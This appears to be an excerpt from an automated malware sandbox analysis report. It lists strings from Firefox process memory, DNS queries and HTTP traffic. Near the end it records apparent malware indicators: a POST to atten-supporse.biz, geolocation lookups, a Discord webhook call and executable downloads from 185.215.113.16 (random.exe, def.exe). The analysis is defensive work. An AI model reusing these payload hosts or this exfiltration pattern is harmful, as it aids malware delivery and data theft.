Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: BETWEEN :prefix \|\| 'www.' \|\| :strippedURL AND :prefix \|\| 'www.' \|\| :strippedURL \|\| X'FFFF'UpdateService:selectUpdate - skipping update because the update's application version is not greater than that of the currently downloaded updatemoz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/about_compat_broker.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: BETWEEN :prefix \|\| 'www.' \|\| :strippedURL AND :prefix \|\| 'www.' \|\| :strippedURL \|\| X'FFFF'UpdateService:selectUpdate - skipping update because the update's application version is not greater than that of the currently downloaded updatemoz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/about_compat_broker.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: BETWEEN :prefix \|\| 'www.' \|\| :strippedURL AND :prefix \|\| 'www.' \|\| :strippedURL \|\| X'FFFF'UpdateService:selectUpdate - skipping update because the update's application version is not greater than that of the currently downloaded updatemoz-extension://a581a2f1-688c-434b-8db8-16166b1993d9/lib/about_compat_broker.jsIt looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: BETWEEN :prefix \|\| :strippedURL AND :prefix \|\| :strippedURL \|\| X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/UpdateService:selectUpdate - skipping update because the update's application version is not greater than the current application versionMAX(EXISTS( equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: BETWEEN :prefix \|\| :strippedURL AND :prefix \|\| :strippedURL \|\| X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/UpdateService:selectUpdate - skipping update because the update's application version is not greater than the current application versionMAX(EXISTS( equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: (browserSettings.update.channel == "release") && (!((currentDate\|date - profileAgeCreated\|date) / 3600000 <= 24)) && (version\|versionCompare('116.!') >= 0)https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: (browserSettings.update.channel == "release") && (!((currentDate\|date - profileAgeCreated\|date) / 3600000 <= 24)) && (version\|versionCompare('116.!') >= 0)https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: (browserSettings.update.channel == "release") && (!((currentDate\|date - profileAgeCreated\|date) / 3600000 <= 24)) && (version\|versionCompare('116.!') >= 0)https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSyC7jsptDS3am4tPx4r3nxis7IMjBc5Dovo&$httpMethod=POST equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://.adsafeprotected.com/services/pub*://www.facebook.com/platform/impression.phpNATIVE_MOUSE_MESSAGE_LEAVE_WINDOW equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.2980365299.00000273A921D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2972232605.00000273AAEDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.2980365299.00000273A921D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2972232605.00000273AAEDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B53000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B53000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2980365299.00000273A921D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2972232605.00000273AAEDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.2980365299.00000273A921D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2972232605.00000273AAEDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3097416157.00000273A51EB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D70A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D70A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D70A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/This represents the number of days that we expect to enroll new users. Note that this property is only used during the analysis phase (not by the SDK) equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/This represents the number of days that we expect to enroll new users. Note that this property is only used during the analysis phase (not by the SDK) equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/This represents the number of days that we expect to enroll new users. Note that this property is only used during the analysis phase (not by the SDK) equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: pictureinpicture%40mozilla.org:1.0.0@mozilla.org/network/safe-file-output-stream;1FileUtils_openSafeFileOutputStreamresource://gre/modules/FileUtils.sys.mjsFileUtils_closeAtomicFileOutputStreamwebcompat-reporter%40mozilla.org:1.5.1https://smartblock.firefox.etp/facebook.svg://cdn.branch.io/branch-latest.min.js://pub.doubleverify.com/signals/pub.js@mozilla.org/network/file-output-stream;1://auth.9c9media.ca/auth/main.js://static.criteo.net/js/ld/publishertag.js://.imgur.io/js/vendor..bundle.js://connect.facebook.net//sdk.js://www.everestjs.net/static/st.v3.js://www.rva311.com/static/js/main..chunk.jswebcompat-reporter@mozilla.org.xpi://libs.coremetrics.com/eluminate.js://.imgur.com/js/vendor..bundle.js://www.google-analytics.com/analytics.js://www.google-analytics.com/gtm/js://www.googletagmanager.com/gtm.js://ssl.google-analytics.com/ga.js://s0.2mdn.net/instream/html5/ima3.js://imasdk.googleapis.com/js/sdkloader/ima3.js://www.googletagservices.com/tag/js/gpt.js*://cdn.adsafeprotected.com/iasPET.1.js://static.adsafeprotected.com/iasPET.1.js://pagead2.googlesyndication.com/tag/js/gpt.js://adservex.media.net/videoAds.js://.moatads.com//moatheader.js://cdn.optimizely.com/public/.js://.vidible.tv//vidible-min.js://www.google-analytics.com/plugins/ua/ec.js://s.webtrends.com/js/advancedLinkTracking.js://s.webtrends.com/js/webtrends.js://s.webtrends.com/js/webtrends.min.jsFEATURE_WEBRENDER_SCISSORED_CACHE_CLEARS equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: mdec.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: icanhazip.com
Source: global traffic	DNS traffic detected: DNS query: 231.12.13.0.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.mylnikov.org
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 23:44:48 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1733787889x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xr8817atrsZIyp2CfK7ToxeaTqDEdPDxtINaQwXpaeXPKPUvA%2Bb140Db3MpY7LSC5%2FRsIz64Sen%2BuJeEu2vb5Tltml%2BnHEVCkF89gITfh2aXzCu4yThfFbEn2DBO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=073cad76d8f3762d0938316120bd6398bf7f87ed-1733787888; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=Gs4AZArme1CizImCdYaZxiK8gq2yRzZqikcbsgvufy8-1733787888591-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ef8dd7dade1de94-EWR{"message": "Unknown Webhook", "code": 10015}

Source: firefox.exe, 00000021.00000002.3052932070.000002739786B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: d985563cac.exe, 00000010.00000003.2975964335.0000000001322000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3135076485.0000000001471000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: d985563cac.exe, 00000010.00000003.2975964335.0000000001322000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/.o
Source: d985563cac.exe, 0000001E.00000003.3135076485.0000000001471000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/?i
Source: file.exe, 00000000.00000002.2124046353.000000000064F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2124046353.00000000005F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: d985563cac.exe, 00000010.00000003.2975964335.0000000001322000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2998838447.0000000001326000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2974238314.0000000001345000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2975683937.0000000001348000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000002.3065632992.0000000001326000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000002.3064819303.0000000000FAB000.00000004.00000010.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3134749628.0000000001481000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3135076485.0000000001471000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3132584782.0000000001490000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: d985563cac.exe, 00000010.00000003.2975964335.0000000001322000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2998838447.0000000001326000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000002.3065632992.0000000001326000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe2
